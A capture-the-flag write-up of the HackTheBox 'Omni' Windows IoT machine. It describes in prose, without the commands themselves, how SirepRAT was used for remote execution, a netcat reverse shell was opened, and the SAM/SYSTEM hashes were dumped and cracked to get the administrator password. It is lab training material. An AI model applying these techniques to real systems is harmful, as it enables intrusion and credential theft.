HackTheBox Writeup — Omni
Hello Guys , I am Faisal Husaini. My username on HTB is “fa1sal” . Also join me on discord. This is the first Windows IoT based machine by HackTheBox
The IP of this box is 10.10.10.204
Port Scan
Running NMAP full port scan on it , we get
We get a lot of Open Ports , the interesting one looks is the port 8080
Checking it into the web browser, we get a basic authentication prompt
Trying default credentials didn't worked out, also we see that the site says “Windows Device Portal”
Since this was a Windows IoT machine, I searched on google about exploiting Windows Device Portal on Windows IoT , I came across a blog which explained about SirepRAT tool which we can use for our benefits here
Here we get the contents of the hosts file on the machine through SirepRAT
To know more about this tool, check the github repo down in the end of this writeup in the References section
In the above, we created a Temp directory in the remote machine
Now we uploaded netcat for windows and then ran a netcat reverse shell and check back the netcat listener on our machine
We got shell, since this is a windows IoT machine, the pattern here are different, we didnt find user flag on the default location, so I searched for it using
We got the location of the user flag, checking the contents we see that its encrypted in Powershell Secure String
Checking for more contents in the directory, we see that there is an iot-admin.xml file
Checking the contents of it, we can see that it is also Powershell Secure String encrypted
When trying to decrypt it, we get an error like below, this might be because the files are owned by some other user,i.e, user app and if you check the documentation of the SirepRAT tool, it tells us we get shell either as NT System or DefaultAccount
Since we have SYSTEM privileges here, we can get the SAM and SYSTEM files so that we can dump it to get the password hashes for the users
We got the files to our local machine and then use impacket’s secretsdump tool to dump the hashes from the files we got
Now we use john to crack the hashes we have
We cracked only one hash from our wordlist and that too for user app, now we use these credentials on the web part where we were prompted for basic authentication
We got in and now checking on the left side and clicking on the Processes options, there is an option to run a command
Since we already uploaded netcat for windows before, we used that again to get a reverse shell and check back our netcat listener
Now we have shell as user app and now we can decode our user flag
Now we move onto getting the user flag
Privilege Escalation
As we remember there was an iot-admin.xml file which was also encrypted as well, we now move onto decrypting that
We have the username as administrator and the password hash
We got password for administrator and now we do the same process which we did before after getting the password for user app and then get reverse shell again and then decrypt the root flag
We got our root flag